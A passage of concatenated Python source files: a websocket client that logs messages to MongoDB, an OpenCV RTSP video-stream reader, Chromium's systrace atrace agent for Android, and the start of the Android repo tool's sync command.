self.connection.send(payload)
def receive(self) -> dict:
if self.connected:
payload = self.connection.recv()
return json.loads(payload)
return dict()
def ping(self) -> None:
payload = 'keepalive'
while self.connected:
if self.traceable:
print(f'[Ping] {payload} [Timeout] {self.timeout}s')
self.connection.ping(payload)
time.sleep(self.timeout)
def disconnect(self) -> None:
if self.connected:
self.connection.close()
class WebsocketEvent(object):
def on_error(self, value: str) -> None:
print(f'[Exception] {value}\n')
def on_start(self):
print(f'[Start] thread {threading.get_native_id()}')
time.sleep(1)
def on_run(self):
print(f'[Run] {threading.active_count()} active threads')
time.sleep(1)
def on_stop(self):
print(f'[Stop] thread {threading.get_native_id()}')
def on_listen(self, client: object, value: dict) -> None:
self.on_response(value)
self.on_collection(client, value)
def on_response(self, value: dict) -> None:
print(f'[Response] {value}')
time.sleep(1)
def on_collection(self, collection: object, value: dict) -> None:
if collection:
collection.insert_one(value)
class WebsocketClient(object):
def __init__(self,
stream: WebsocketStream,
event: WebsocketEvent = None,
collection: pymongo.collection.Collection = None) -> None:
self.stream = stream
self.collection = collection
self.running = False
self.thread = None
self.keepalive = None
self.event = WebsocketEvent() if event is None else event
def listen(self) -> None:
while self.running:
message = self.stream.receive()
if message:
self.event.on_listen(self.collection, message)
def start(self, value: dict) -> None:
self.event.on_start()
self.running = True
self.stream.connect()
self.stream.send(value)
self.listen()
def run(self, params: dict) -> None:
self.event.on_run()
self.thread = threading.Thread(target=self.start, args=(params,))
self.thread.start()
def stop(self) -> None:
self.event.on_stop()
self.running = False
self.stream.disconnect()
self.thread.join()
def websocket_client(key: str = None,
secret: str = None,
passphrase: str = None,
event: WebsocketEvent = None,
collection: pymongo.collection.Collection = None,
traceable: bool = False) -> WebsocketClient:
header = None
if key and secret and passphrase:
header = WebsocketHeader(key, secret, passphrase)
stream = WebsocketStream(header=header, traceable=traceable)
return WebsocketClient(stream, event, collection)
|
cv_videostream.py
|
# import the necessary packages
from threading import Thread
import cv2, time
class CV_VideoStream:
""" Maintain live RTSP feed without buffering. """
def __init__(self, src=0, name="WebcamVideoStream", videocapture=cv2.VideoCapture, verbose = False ):
"""
src: the path to an RTSP server. should start with "rtsp://"
name: give it a name
verbose: print log or not
"""
self._src = src
self.name = name # initialize the thread name
self.videocapture = videocapture
self._verbose = verbose
self.fps = 0.0 # measured fps
self._stream = None
self._frame = None # returned images from stream
# initialize the variable used to indicate if the thread should be stopped
self._stopped = False
self._fps = FPS()
def start(self):
"""start the thread to read frames from the video stream"""
if self._verbose:
print(f"[INFO] connecting to Cam: {self._src}")
self._stopped = False
self._thread = Thread(target=self.update, name=self.name, args=())
self._thread.daemon = True
self._thread.start()
self._fps.start()
return self
def connect(self):
if self.isOpened():
self._stream.release()
# self._stream = cv2.VideoCapture(self._src)
self._stream = self.videocapture(self._src) # FFMPEG will wait for 30 seconds if there is not connection found
if self._verbose:
if self._stream.isOpened():
print(f"[INFO] connected to Cam: {self._src}")
print(f"[INFO]CV_VideoCapture Backend: {self._stream.getBackendName()}")
else:
print(f"[INFO] Failed to connect Cam: {self._src}")
time.sleep(1)
def update(self):
"""keep looping infinitely until the thread is stopped"""
while not self._stopped:
if self._stream is not None and self._stream.isOpened():
(self.grabbed, self._frame) = self._stream.read()
if self.grabbed:
self._fps.update()
self.last = datetime.datetime.now()
time.sleep(0.01)
else:
self.connect()
time.sleep(0.01)
# time.sleep(1)
if self._fps.elapsed() > 5:
self._fps.stop()
self.fps = self._fps.fps
print(self.fps)
if self._fps.numFrames == 0:
# if number of frames in last 5 seconds is 0 then re connect
print(f"[INFO] Lost connection, retrying to connect Cam: {self._src}")
self.connect()
self._fps.start()
# if datetime.datetime.now() - self.lastaccess > 5.0:
# Thread has stopped
if self._verbose:
print(f"[INFO] Connection closed Cam: {self._src}")
def read(self):
# return the frame most recently read
self.lastaccess = datetime.datetime.now()
return self._frame
def stop(self):
# indicate that the thread should be stopped or closed
self._close()
def close(self):
# indicate that the thread should be stopped or closed
self._close()
def _close(self):
if self.isOpened():
self._stream.release()
self._stopped = True
# wait until stream resources are released (producer thread might be still grabbing frame)
# Todo this code does not always work, Thread is a daemon so closes anyhow
# if not self._thread._is_stopped:
# self._thread.join()
# else:
# pass
def isOpened(self):
try:
return self._stream is not None and self._stream.isOpened()
except:
return False
import datetime
class FPS:
'''Calculate the frames per second'''
def __init__(self):
# store the start time, end time, and total number of frames
# that were examined between the start and end intervals
self._start = None
self._end = None
self.numFrames = 0
self.fps = 0.0
def start(self):
# start the timer
self._start = datetime.datetime.now()
self._end = None
self.numFrames = 0
return self
def stop(self):
# stop the timer
self._end = datetime.datetime.now()
self.fps = self.numFrames / self.elapsed()
def update(self):
# increment the total number of frames examined during the
# start and end intervals
self.numFrames += 1
# return self._numFrames
def elapsed(self):
# return the total number of seconds between the start and
# end interval
# if self._end is None:
self._end = datetime.datetime.now()
# ret = (self._end - self._start).total_seconds()
# self._end = None
# else:
# ret = (self._end - self._start).total_seconds()
return (self._end - self._start).total_seconds()
def poll_fps(self):
# compute the (approximate) frames per second without stopping
# if self._end is not None:
# return self._numFrames / self.elapsed()
# else:
self.numFrames += 1
self._end = datetime.datetime.now()
self.fps = self.numFrames / self.elapsed()
return self.fps
# self._end = None
# def fps(self):
# # compute the (approximate) frames per second, must be stopped first
# return self._numFrames / self.elapsed()
if __name__ == '__main__':
vs = CV_VideoStream(src="rtsp://192.168.183.242:554", verbose=True).start()
while (1):
frame = vs.read()
if frame is not None:
cv2.imshow('VIDEO', frame)
else:
time.sleep(0.1)
k = cv2.waitKey(10)
txt = None
if k == 27 or k == 3:
break # esc to quit
cv2.destroyAllWindows()
|
atrace_agent.py
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import optparse
import py_utils
import re
import subprocess
import sys
import threading
import zlib
from devil.android import device_utils
from py_trace_event import trace_time as trace_time_module
from systrace import trace_result
from systrace import tracing_agents
from systrace import util
# Text that ADB sends, but does not need to be displayed to the user.
ADB_IGNORE_REGEXP = r'^capturing trace\.\.\. done|^capturing trace\.\.\.'
# The number of seconds to wait on output from ADB.
ADB_STDOUT_READ_TIMEOUT = 0.2
# The adb shell command to initiate a trace.
ATRACE_BASE_ARGS = ['atrace']
# If a custom list of categories is not specified, traces will include
# these categories (if available on the device).
DEFAULT_CATEGORIES = 'sched gfx view dalvik webview input disk am wm'.split()
# The command to list trace categories.
LIST_CATEGORIES_ARGS = ATRACE_BASE_ARGS + ['--list_categories']
# Minimum number of seconds between displaying status updates.
MIN_TIME_BETWEEN_STATUS_UPDATES = 0.2
# ADB sends this text to indicate the beginning of the trace data.
TRACE_START_REGEXP = r'TRACE\:'
# Plain-text trace data should always start with this string.
TRACE_TEXT_HEADER = '# tracer'
# The property name for switching on and off tracing during boot.
BOOTTRACE_PROP = 'persist.debug.atrace.boottrace'
# The file path for specifying categories to be traced during boot.
BOOTTRACE_CATEGORIES = '/data/misc/boottrace/categories'
def list_categories(config):
"""List the possible trace event categories.
This function needs the tracing config since it needs to get the serial
number of the device to send a command to.
Args:
config: Tracing config.
"""
devutils = device_utils.DeviceUtils(config.device_serial_number)
print '\n'.join(devutils.RunShellCommand(LIST_CATEGORIES_ARGS))
if not devutils.HasRoot():
print '\nNOTE: more categories may be available with adb root\n'
def get_available_categories(config):
"""Gets the list of atrace categories available for tracing.
Args:
config: Tracing config.
"""
devutils = device_utils.DeviceUtils(config.device_serial_number)
categories_output = devutils.RunShellCommand(LIST_CATEGORIES_ARGS)
return [c.split('-')[0].strip() for c in categories_output]
def try_create_agent(config):
"""Create an Atrace agent.
Args:
config: Command line config.
"""
if config.target != 'android':
return None
if config.from_file is not None:
return None
# Check device SDK version.
device_sdk_version = util.get_device_sdk_version()
if device_sdk_version <= 17:
print ('Device SDK versions <= 17 not supported.\n'
'Your device SDK version is %d.' % device_sdk_version)
return None
if device_sdk_version <= 22 and config.boot:
print ('--boot option does not work on the device SDK '
'version 22 or before.\nYour device SDK version '
'is %d.' % device_sdk_version)
return None
return BootAgent() if config.boot else AtraceAgent()
def _construct_extra_atrace_args(config, categories):
"""Construct extra arguments (-a, -k, categories) for atrace command.
Args:
config: Tracing config.
"""
extra_args = []
if config.app_name is not None:
extra_args.extend(['-a', config.app_name])
if config.kfuncs is not None:
extra_args.extend(['-k', config.kfuncs])
extra_args.extend(categories)
return extra_args
def _construct_atrace_args(config, categories):
"""Builds the command used to invoke a trace process.
Returns:
A tuple where the first element is an array of command arguments, and
the second element is a boolean which will be true if the command will
stream trace data.
"""
atrace_args = ATRACE_BASE_ARGS[:]
if config.compress_trace_data:
atrace_args.extend(['-z'])
if (config.trace_time is not None) and (config.trace_time > 0):
atrace_args.extend(['-t', str(config.trace_time)])
if (config.trace_buf_size is not None) and (config.trace_buf_size > 0):
atrace_args.extend(['-b', str(config.trace_buf_size)])
elif 'sched' in categories:
# 'sched' is a high-volume tag, double the default buffer size
# to accommodate that
atrace_args.extend(['-b', '4096'])
extra_args = _construct_extra_atrace_args(config, categories)
atrace_args.extend(extra_args)
return atrace_args
class AtraceAgent(tracing_agents.TracingAgent):
def __init__(self):
super(AtraceAgent, self).__init__()
self._adb = None
self._trace_data = None
self._tracer_args = None
self._collection_thread = None
self._device_utils = None
self._device_serial_number = None
self._config = None
self._categories = None
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StartAgentTracing(self, config, timeout=None):
self._config = config
self._categories = config.atrace_categories
if not self._categories:
self._categories = DEFAULT_CATEGORIES
avail_cats = get_available_categories(config)
unavailable = [x for x in self._categories if x not in avail_cats]
self._categories = [x for x in self._categories if x in avail_cats]
if unavailable:
print 'These categories are unavailable: ' + ' '.join(unavailable)
self._device_utils = device_utils.DeviceUtils(config.device_serial_number)
self._device_serial_number = config.device_serial_number
self._tracer_args = _construct_atrace_args(config,
self._categories)
self._device_utils.RunShellCommand(self._tracer_args + ['--async_start'])
return True
def _collect_and_preprocess(self):
"""Collects and preprocesses trace data.
Stores results in self._trace_data.
"""
trace_data = self._collect_trace_data()
self._trace_data = self._preprocess_trace_data(trace_data)
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StopAgentTracing(self, timeout=None):
"""Stops tracing and starts collecting results.
To synchronously retrieve the results after calling this function,
call GetResults().
"""
self._collection_thread = threading.Thread(
target=self._collect_and_preprocess)
self._collection_thread.start()
return True
@py_utils.Timeout(tracing_agents.GET_RESULTS_TIMEOUT)
def GetResults(self, timeout=None):
"""Waits for collection thread to finish and returns trace results."""
self._collection_thread.join()
self._collection_thread = None
return trace_result.TraceResult('systemTraceEvents', self._trace_data)
def SupportsExplicitClockSync(self):
return True
def RecordClockSyncMarker(self, sync_id, did_record_sync_marker_callback):
"""Records a clock sync marker.
Args:
sync_id: ID string for clock sync marker.
"""
cmd = 'echo trace_event_clock_sync: name=%s >' \
' /sys/kernel/debug/tracing/trace_marker' % sync_id
with self._device_utils.adb.PersistentShell(
self._device_serial_number) as shell:
t1 = trace_time_module.Now()
shell.RunCommand(cmd, close=True)
did_record_sync_marker_callback(t1, sync_id)
def _dump_trace(self):
"""Dumps the atrace buffer and returns the dumped buffer."""
dump_cmd = self._tracer_args + ['--async_dump']
return self._device_utils.RunShellCommand(dump_cmd, raw_output=True)
def _stop_trace(self):
"""Stops atrace.
Tries to stop the atrace asynchronously. Note that on some devices,
--async-stop does not work. Thus, this uses the fallback
method of running a zero-length synchronous trace if that fails.
"""
self._device_utils.RunShellCommand(self._tracer_args + ['--async_stop'])
is_trace_enabled_cmd = ['cat', '/sys/kernel/debug/tracing/tracing_on']
trace_on = int(self._device_utils.RunShellCommand(is_trace_enabled_cmd)[0])
if trace_on:
self._device_utils.RunShellCommand(self._tracer_args + ['-t 0'])
def _collect_trace_data(self):
"""Reads the output from atrace and stops the trace."""
result = self._dump_trace()
data_start = re.search(TRACE_START_REGEXP, result)
if data_start:
data_start = data_start.end(0)
else:
raise IOError('Unable to get atrace data. Did you forget adb root?')
output = re.sub(ADB_IGNORE_REGEXP, '', result[data_start:])
self._stop_trace()
return output
def _preprocess_trace_data(self, trace_data):
"""Performs various processing on atrace data.
Args:
trace_data: The raw trace data.
Returns:
The processed trace data.
"""
if trace_data:
trace_data = strip_and_decompress_trace(trace_data)
if not trace_data:
print >> sys.stderr, ('No data was captured. Output file was not '
'written.')
sys.exit(1)
if self._config.fix_threads:
# Issue ps command to device and patch thread names
ps_dump = do_preprocess_adb_cmd('ps -t',
self._config.device_serial_number)
if ps_dump is not None:
thread_names = extract_thread_list(ps_dump)
trace_data = fix_thread_names(trace_data, thread_names)
if self._config.fix_tgids:
# Issue printf command to device and patch tgids
procfs_dump = do_preprocess_adb_cmd('printf "%s\n" ' +
'/proc/[0-9]*/task/[0-9]*',
self._config.device_serial_number)
if procfs_dump is not None:
pid2_tgid = extract_tgids(procfs_dump)
trace_data = fix_missing_tgids(trace_data, pid2_tgid)
if self._config.fix_circular:
trace_data = fix_circular_traces(trace_data)
return trace_data
class BootAgent(AtraceAgent):
"""AtraceAgent that specializes in tracing the boot sequence."""
def __init__(self):
super(BootAgent, self).__init__()
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StartAgentTracing(self, config, timeout=None):
self._config = config
try:
setup_args = _construct_boot_setup_command(config)
subprocess.check_call(setup_args)
except OSError as error:
print >> sys.stderr, (
'The command "%s" failed with the following error:' %
' '.join(setup_args))
print >> sys.stderr, ' ', error
sys.exit(1)
def _dump_trace(self): #called by StopAgentTracing
"""Dumps the running trace asynchronously and returns the dumped trace."""
dump_cmd = _construct_boot_trace_command(self._config)
return self._device_utils.RunShellCommand(dump_cmd, raw_output=True)
def _stop_trace(self): # called by _collect_trace_data via StopAgentTracing
# pylint: disable=no-self-use
# This is a member function for consistency with AtraceAgent
pass # don't need to stop separately; already done in dump_trace
def _construct_boot_setup_command(config):
echo_args = (['echo'] + config.atrace_categories +
['>', BOOTTRACE_CATEGORIES])
setprop_args = ['setprop', BOOTTRACE_PROP, '1']
reboot_args = ['reboot']
return util.construct_adb_shell_command(
echo_args + ['&&'] + setprop_args + ['&&'] + reboot_args,
config.device_serial_number)
def _construct_boot_trace_command(config):
atrace_args = ['atrace', '--async_stop']
setprop_args = ['setprop', BOOTTRACE_PROP, '0']
rm_args = ['rm', BOOTTRACE_CATEGORIES]
return util.construct_adb_shell_command(
atrace_args + ['&&'] + setprop_args + ['&&'] + rm_args,
config.device_serial_number)
def extract_thread_list(trace_text):
"""Removes the thread list from the given trace data.
Args:
trace_text: The text portion of the trace
Returns:
a map of thread ids to thread names
"""
threads = {}
# start at line 1 to skip the top of the ps dump:
text = trace_text.splitlines()
for line in text[1:]:
cols = line.split(None, 8)
if len(cols) == 9:
tid = int(cols[1])
name = cols[8]
threads[tid] = name
return threads
def extract_tgids(trace_text):
"""Removes the procfs dump from the given trace text
Args:
trace_text: The text portion of the trace
Returns:
a map of pids to their tgid.
"""
tgid_2pid = {}
text = trace_text.splitlines()
for line in text:
result = re.match('^/proc/([0-9]+)/task/([0-9]+)', line)
if result:
parent_pid, tgid = result.group(1, 2)
tgid_2pid[tgid] = parent_pid
return tgid_2pid
def strip_and_decompress_trace(trace_data):
"""Fixes new-lines and decompresses trace data.
Args:
trace_data: The trace data returned by atrace.
Returns:
The decompressed trace data.
"""
# Collapse CRLFs that are added by adb shell.
if trace_data.startswith('\r\n'):
trace_data = trace_data.replace('\r\n', '\n')
elif trace_data.startswith('\r\r\n'):
# On windows, adb adds an extra '\r' character for each line.
trace_data = trace_data.replace('\r\r\n', '\n')
# Skip the initial newline.
if trace_data[0] == '\n':
trace_data = trace_data[1:]
if not trace_data.startswith(TRACE_TEXT_HEADER):
# No header found, so assume the data is compressed.
trace_data = zlib.decompress(trace_data)
# Enforce Unix line-endings.
trace_data = trace_data.replace('\r', '')
# Skip any initial newlines.
while trace_data and trace_data[0] == '\n':
trace_data = trace_data[1:]
return trace_data
def fix_thread_names(trace_data, thread_names):
"""Replaces thread ids with their names.
Args:
trace_data: The atrace data.
thread_names: A mapping of thread ids to thread names.
Returns:
The updated trace data.
"""
def repl(m):
tid = int(m.group(2))
if tid > 0:
name = thread_names.get(tid)
if name is None:
name = m.group(1)
if name == '<...>':
name = '<' + str(tid) + '>'
thread_names[tid] = name
return name + '-' + m.group(2)
else:
return m.group(0)
# matches something like:
# Binder_2-895, or com.google.android.inputmethod.latin-1078 etc...
trace_data = re.sub(r'^\s*(\S+)-(\d+)', repl, trace_data,
flags=re.MULTILINE)
return trace_data
def fix_missing_tgids(trace_data, pid2_tgid):
"""Replaces missing TGIDs from the trace data with those found in procfs
Args:
trace_data: the atrace data
Returns:
The updated trace data with missing TGIDs replaced with the correct TGID
"""
def repl(m):
tid = m.group(2)
if (int(tid) > 0 and m.group(1) != '<idle>' and m.group(3) == '(-----)'
and tid in pid2_tgid):
# returns Proc_name-PID (TGID)
# Binder_2-381 (-----) becomes Binder_2-381 (128)
return m.group(1) + '-' + m.group(2) + ' ( ' + pid2_tgid[tid] + ')'
return m.group(0)
# matches something like:
# Binder_2-895 (-----)
trace_data = re.sub(r'^\s*(\S+)-(\d+)\s+(\(\S+\))', repl, trace_data,
flags=re.MULTILINE)
return trace_data
def fix_circular_traces(out):
"""Fix inconsistentcies in traces due to circular buffering.
The circular buffers are kept per CPU, so it is not guaranteed that the
beginning of a slice is overwritten before the end. To work around this, we
throw away the prefix of the trace where not all CPUs have events yet.
Args:
out: The data to fix.
Returns:
The updated trace data.
"""
# If any of the CPU's buffers have filled up and
# older events have been dropped, the kernel
# emits markers of the form '##### CPU 2 buffer started ####' on
# the line before the first event in the trace on that CPU.
#
# No such headers are emitted if there were no overflows or the trace
# was captured with non-circular buffers.
buffer_start_re = re.compile(r'^#+ CPU \d+ buffer started', re.MULTILINE)
start_of_full_trace = 0
while True:
result = buffer_start_re.search(out, start_of_full_trace + 1)
if result:
start_of_full_trace = result.start()
else:
break
if start_of_full_trace > 0:
# Need to keep the header intact to make the importer happy.
end_of_header = re.search(r'^[^#]', out, re.MULTILINE).start()
out = out[:end_of_header] + out[start_of_full_trace:]
return out
def do_preprocess_adb_cmd(command, serial):
"""Run an ADB command for preprocessing of output.
Run an ADB command and get the results. This function is used for
running commands relating to preprocessing of output data.
Args:
command: Command to run.
serial: Serial number of device.
"""
args = [command]
dump, ret_code = util.run_adb_shell(args, serial)
if ret_code != 0:
return None
dump = ''.join(dump)
return dump
class AtraceConfig(tracing_agents.TracingConfig):
def __init__(self, atrace_categories, trace_buf_size, kfuncs,
app_name, fix_threads, fix_tgids, fix_circular,
compress_trace_data, boot, from_file, device_serial_number,
trace_time, target):
tracing_agents.TracingConfig.__init__(self)
self.atrace_categories = atrace_categories
self.trace_buf_size = trace_buf_size
self.kfuncs = kfuncs
self.app_name = app_name
self.fix_threads = fix_threads
self.fix_tgids = fix_tgids
self.fix_circular = fix_circular
self.compress_trace_data = compress_trace_data
self.boot = boot
self.from_file = from_file
self.device_serial_number = device_serial_number
self.trace_time = trace_time
self.target = target
def add_options(parser):
options = optparse.OptionGroup(parser, 'Atrace options')
options.add_option('--atrace-categories', dest='atrace_categories',
help='Select atrace categories with a comma-delimited '
'list, e.g. --atrace-categories=cat1,cat2,cat3')
options.add_option('-k', '--ktrace', dest='kfuncs', action='store',
help='specify a comma-separated list of kernel functions '
'to trace')
options.add_option('-a', '--app', dest='app_name', default=None,
type='string', action='store',
help='enable application-level tracing for '
'comma-separated list of app cmdlines')
options.add_option('--no-compress', dest='compress_trace_data',
default=True, action='store_false',
help='Tell the device not to send the trace data in '
'compressed form.')
options.add_option('--boot', dest='boot', default=False, action='store_true',
help='reboot the device with tracing during boot enabled.'
'The report is created by hitting Ctrl+C after the device'
'has booted up.')
return options
def get_config(options):
return AtraceConfig(options.atrace_categories,
options.trace_buf_size, options.kfuncs,
options.app_name, options.fix_threads,
options.fix_tgids, options.fix_circular,
options.compress_trace_data, options.boot,
options.from_file, options.device_serial_number,
options.trace_time, options.target)
|
sync.py
|
#
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import netrc
from optparse import SUPPRESS_HELP
import os
import pickle
import re
import shutil
import socket
import subprocess
import sys
import time
from pyversion import is_python3
if is_python3():
import urllib.parse
import xmlrpc.client
else:
import imp
import urlparse
import xmlrpclib
urllib = imp.new_module('urllib')
urllib.parse = urlparse
xmlrpc = imp.new_module('xmlrpc')
xmlrpc.client = xmlrpclib
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
import resource
def _rlimit_nofile():
return resource.getrlimit(resource.RLIMIT_NOFILE)
except ImportError:
def _rlimit_nofile():
return (256, 256)
try:
import multiprocessing
except ImportError:
multiprocessing = None
from git_command import GIT, git_require
from git_refs import R_HEADS, HEAD
from main import WrapperModule
from project import Project
from project import RemoteSpec
from command import Command, MirrorSafeCommand
from error import RepoChangedException, GitError, ManifestParseError
from project import SyncBuffer
from progress import Progress
_ONE_DAY_S = 24 * 60 * 60
class _FetchError(Exception):
"""Internal error thrown in _FetchHelper() when we don't want stack trace."""
pass
class Sync(Command, MirrorSafeCommand):
jobs = 1
common = True
helpSummary = "Update working tree to the latest revision"
helpUsage = """
%prog [<project>...]
"""
helpDescription = """
The '%prog' command synchronizes local project directories
with the remote repositories specified in the manifest. If a local
project does not yet exist, it will clone a new local directory from
the remote repository and set up tracking branches as specified in
the manifest. If the local project already exists, '%prog'
will update the remote branches and rebase any new local changes
on top of the new remote changes.
'%prog' will synchronize all projects listed at the command
line. Projects can be specified either by name, or by a relative
or absolute path to the project's local directory. If no projects
are specified, '%prog' will synchronize all projects listed in
the manifest.
The -d/--detach option can be used to switch specified projects
back to the manifest revision. This option is especially helpful
if the project is currently on a topic branch, but the manifest
revision is temporarily needed.
The -s/--smart-sync option can be used to sync to a known good
build as specified by the manifest-server element in the current
manifest. The -t/--smart-tag option is similar and allows you to
specify a custom tag/label.
The -u/--manifest-server-username and -p/--manifest-server-password
options can be used to specify a username and password to authenticate
with the manifest server when using the -s or -t option.
If -u and -p are not specified when using the -s or -t option, '%prog'
will attempt to read authentication credentials for the manifest server
from the user's .netrc file.
'%prog' will not use authentication credentials from -u/-p or .netrc
if the manifest server specified in the manifest file already includes
credentials.
The -f/--force-broken option can be used to proceed with syncing
other projects if a project sync fails.
The --no-clone-bundle option disables any attempt to use
$URL/clone.bundle to bootstrap a new Git repository from a
resumeable bundle file on a content delivery network. This
may be necessary if there are problems with the local Python
HTTP client or proxy configuration, but the Git binary works.
The --fetch-submodules option enables fetching Git submodules
of a project from server.
SSH Connections
---------------
If at least one project remote URL uses an SSH connection (ssh://,
git+ssh://, or user@host:path syntax) repo will automatically
enable the SSH ControlMaster option when connecting to that host.
This feature permits other projects in the same '%prog' session to
reuse the same SSH tunnel, saving connection setup overheads.
To disable this behavior on UNIX platforms, set the GIT_SSH
environment variable to 'ssh'. For example:
export GIT_SSH=ssh
%prog
Compatibility
~~~~~~~~~~~~~
This feature is automatically disabled on Windows, due to the lack
of UNIX domain socket support.
This feature is not compatible with url.insteadof rewrites in the
user's ~/.gitconfig. '%prog' is currently not able to perform the
rewrite early enough to establish the ControlMaster tunnel.
If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or
later is required to fix a server side protocol bug.
"""
def _Options(self, p, show_smart=True):
try:
self.jobs = self.manifest.default.sync_j
except ManifestParseError:
self.jobs = 1
p.add_option('-f', '--force-broken',
dest='force_broken', action='store_true',
help="continue sync even if a project fails to sync")
p.add_option('-l', '--local-only',
dest='local_only', action='store_true',
help="only update working tree, don't fetch")
p.add_option('-n', '--network-only',
dest='network_only', action='store_true',
help="fetch only, don't update working tree")
p.add_option('-d', '--detach',
dest='detach_head', action='store_true',
help='detach projects back to manifest revision')
p.add_option('-c', '--current-branch',
dest='current_branch_only', action='store_true',
help='fetch only current branch from server')
p.add_option('-q', '--quiet',
dest='quiet', action='store_true',
help='be more quiet')
p.add_option('-j', '--jobs',
dest='jobs', action='store', type='int',
help="projects to fetch simultaneously (default %d)" % self.jobs)
p.add_option('-m', '--manifest-name',
dest='manifest_name',
help='temporary manifest to use for this sync', metavar='NAME.xml')
p.add_option('--no-clone-bundle',
dest='no_clone_bundle', action='store_true',
help='disable use of /clone.bundle on HTTP/HTTPS')
p.add_option('-u', '--manifest-server-username', action='store',
dest='manifest_server_username',
help='username to authenticate with the manifest server')
p.add_option('-p', '--manifest-server-password', action='store',
dest='manifest_server_password',
help='password to authenticate with the manifest server')
p.add_option('--fetch-submodules',
dest='fetch_submodules', action='store_true',
help='fetch submodules from server')
p.add_option('--no-tags',
dest='no_tags', action='store_true',
help="don't fetch tags")
if show_smart:
p.add_option('-s', '--smart-sync',
dest='smart_sync', action='store_true',
help='smart sync using manifest from a known good build')
p.add_option('-t', '--smart-tag',
dest='smart_tag', action='store',
help='smart sync using manifest from a known tag')
g = p.add_option_group('repo Version options')
g.add_option('--no-repo-verify',
dest='no_repo_verify', action='store_true',
help='do not verify repo source code')
g.add_option('--repo-upgraded',
dest='repo_upgraded', action='store_true',
help=SUPPRESS_HELP)
def _FetchHelper(self, opt, project, lock, fetched, pm, sem, err_event):
"""Main function of the fetch threads when jobs are > 1.
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to fetch.
lock: Lock for accessing objects that are shared amongst multiple
_FetchHelper() threads.
fetched: set object that we will add project.gitdir to when we're done
(with our lock held).
pm: Instance of a Project object. We will call pm.update() (with our
lock held).
sem: We'll release() this semaphore when we exit so that another thread
can be started up.
err_event: We'll set this event in the case of an error (after printing
out info about the error).
"""
# We'll set to true once we've locked the lock.
did_lock = False
if not opt.quiet:
print('Fetching project %s' % project.name)
# Encapsulate everything in a try/except/finally so that:
# - We always set err_event in the case of an exception.
# - We always make sure we call sem.release().
# - We always make sure we unlock the lock if we locked it.
try:
try:
start = time.time()
success = project.Sync_NetworkHalf(
quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
clone_bundle=not opt.no_clone_bundle,
no_tags=opt.no_tags)
self._fetch_times.Set(project, time.time() - start)
# Lock around all the rest of the code, since printing, updating a set
# and Progress.update() are not thread safe.
lock.acquire()
did_lock = True
if not success:
print('error: Cannot fetch %s' % project.name, file=sys.stderr)
if opt.force_broken:
print('warn: --force-broken, continuing to sync',
file=sys.stderr)
else:
raise _FetchError()
fetched.add(project.gitdir)
pm.update()
except _FetchError:
err_event.set()
except:
err_event.set()
raise
finally:
if did_lock:
lock.release()
sem.release()
def _Fetch(self, projects, opt):
fetched = set()
pm = Progress('Fetching projects', len(projects))
if self.jobs == 1:
for project in projects:
pm.update()
if not opt.quiet:
print('Fetching project %s' % project.name)
if project.Sync_NetworkHalf(
quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
clone_bundle=not opt.no_clone_bundle,
no_tags=opt.no_tags):
fetched.add(project.gitdir)
else:
print('error: Cannot fetch %s' % project.name, file=sys.stderr)
if opt.force_broken:
print('warn: --force-broken, continuing to sync', file=sys.stderr)
else:
sys.exit(1)
else:
threads = set()
lock = _threading.Lock()
sem = _threading.Semaphore(self.jobs)
err_event = _threading.Event()
for project in projects:
# Check for any errors before starting any new threads.
# ...we'll let existing threads finish, though.
if err_event.isSet():
break
sem.acquire()
t = _threading.Thread(target = self._FetchHelper,
args = (opt,
project,
lock,
fetched,
pm,
sem,
err_event))
# Ensure that Ctrl-C will not freeze the repo process.
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.isSet():
print('\nerror: Exited sync due to fetch errors', file=sys.stderr)
sys.exit(1)
pm.end()
self._fetch_times.Save()
self._GCProjects(projects)
return fetched
def _GCProjects(self, projects):
has_dash_c = git_require((1, 7, 2))
if multiprocessing and has_dash_c:
cpu_count = multiprocessing.cpu_count()
else:
cpu_count = 1
jobs = min(self.jobs, cpu_count)
if jobs < 2:
for project in projects:
project.bare_git.gc('--auto')
return
config = {'pack.threads': cpu_count / jobs if cpu_count > jobs else 1}
threads = set()
sem = _threading.Semaphore(jobs)
err_event = _threading.Event()
def GC(project):
try:
try:
project.bare_git.gc('--auto', config=config)
except GitError:
err_event.set()
except:
err_event.set()
raise
finally:
sem.release()
for project in projects:
if err_event.isSet():
break
sem.acquire()
t = _threading.Thread(target=GC, args=(project,))
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
if err_event.isSet():
print('\nerror: Exited sync due to gc errors', file=sys.stderr)
sys.exit(1)
def _ReloadManifest(self, manifest_name=None):
if manifest_name:
# Override calls _Unload already
self.manifest.Override(manifest_name)
else:
self.manifest._Unload()
def UpdateProjectList(self):
new_project_paths = []
for project in self.GetProjects(None, missing_ok=True):
if project.relpath:
new_project_paths.append(project.relpath)
file_name = 'project.list'
file_path = os.path.join(self.manifest.repodir, file_name)
old_project_paths = []
if os.path.exists(file_path):
fd = open(file_path, 'r')
try:
old_project_paths = fd.read().split('\n')
finally:
fd.close()
for path in old_project_paths:
if not path:
continue
if path not in new_project_paths:
# If the path has already been deleted, we don't need to do it
if os.path.exists(self.manifest.topdir + '/' + path):
project = Project(
manifest = self.manifest,
name = path,
remote = RemoteSpec('origin'),
gitdir = os.path.join(self.manifest.topdir,
path, '.git'),
worktree = os.path.join(self.manifest.topdir, path),
relpath = path,
revisionExpr = 'HEAD',
revisionId = None,
groups = None)
if project.IsDirty():
